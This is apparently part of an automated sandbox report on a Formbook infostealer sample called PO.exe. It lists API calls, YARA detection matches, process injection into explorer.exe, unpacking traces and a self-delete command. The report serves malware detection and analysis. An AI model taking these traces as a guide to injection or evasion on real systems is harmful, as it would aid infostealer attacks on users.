          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041A060 NtClose,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041A110 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F30 NtCreateFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419FE0 NtReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F2B NtCreateFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419FDA NtReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00419F82 NtReadFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A799D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A795F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A7AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A796D0 NtCreateKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A79FE0 NtCreateMutant,
          Source: C:\Windows\explorer.exeCode function: 3_2_06D52A52 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CEA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CE9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AA060 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AA110 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9FE0 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9F30 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9F82 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9FDA NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008A9F2B NtCreateFile,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004046A7
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E1EC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E1F8
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041EADA
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00409E3D
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041D680
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A620A0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B020A8
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4B090
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B028EC
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B0E824
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF1002
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A54120
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A3F900
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B022AE
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A6EBB0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AF03DA
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFDBD2
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B02B28
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4841F
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFD466
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A62581
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A4D5E0
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B025DD
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A30D20
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B02D07
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B01D55
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B02EF7
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00A56E30
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00AFD616
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B01FF1
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00B0DFCE
          Source: C:\Windows\explorer.exeCode function: 3_2_06D52A52
          Source: C:\Windows\explorer.exeCode function: 3_2_06D4ACF2
          Source: C:\Windows\explorer.exeCode function: 3_2_06D4ACE9
          Source: C:\Windows\explorer.exeCode function: 3_2_06D51882
          Source: C:\Windows\explorer.exeCode function: 3_2_06D49072
          Source: C:\Windows\explorer.exeCode function: 3_2_06D49069
          Source: C:\Windows\explorer.exeCode function: 3_2_06D55A0C
          Source: C:\Windows\explorer.exeCode function: 3_2_06D50152
          Source: C:\Windows\explorer.exeCode function: 3_2_06D4DB1F
          Source: C:\Windows\explorer.exeCode function: 3_2_06D4DB22
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBB090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD20A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D720A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D61002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CB841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CBD5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CD2581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D71D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CAF900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D72D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CA0D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC4120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D72EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D722AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CC6E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D71FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04CDEBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_04D72B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AE1EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AE1F8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_008AEADA
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00892D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00899E3D
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00899E40
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 10_2_00892FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 04CAB150 appears 35 times
          Source: C:\Users\user\Desktop\PO.exeCode function: String function: 00A3B150 appears 45 times
          Source: PO.exe, 00000000.00000003.234946045.000000001EF76000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000003.242100037.000000000098F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
          Source: PO.exe, 00000001.00000002.294578840.0000000002BFE000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs PO.exe
          Source: PO.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@3/2
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_01
          Source: C:\Users\user\Desktop\PO.exeFile created: C:\Users\user\AppData\Local\Temp\nsoBF0C.tmpJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: PO.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO.exeReversingLabs: Detection: 16%
          Source: C:\Users\user\Desktop\PO.exeFile read: C:\Users\user\Desktop\PO.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO.exeProcess created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
          Source: C:\Users\user\Desktop\PO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: explorer.pdbUGP source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.234541643.000000001EFF0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.293490936.0000000000B2F000.00000040.00000001.sdmp, explorer.exe, 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO.exe, explorer.exe
          Source: Binary string: C:\xampp\htdocs\Cryptor\1a839a6cf4cc488e888465f9ce8aa846\Loader\Loader\Release\d18g7xa93.pdb source: PO.exe, 00000000.00000002.242784001.0000000073352000.00000002.00020000.sdmp, 5t94xwjj.dll.0.dr
          Source: Binary string: explorer.pdb source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\PO.exeUnpacked PE file: 1.2.PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\PO.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041B828 push cs; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00418292 pushad ; retf
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00417C74 push ds; iretd
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_0041E638 pushad ; ret
          Source: C:\Users\user\Desktop\PO.exeCode function: 1_2_00416740 push FFFFFF87h; retf
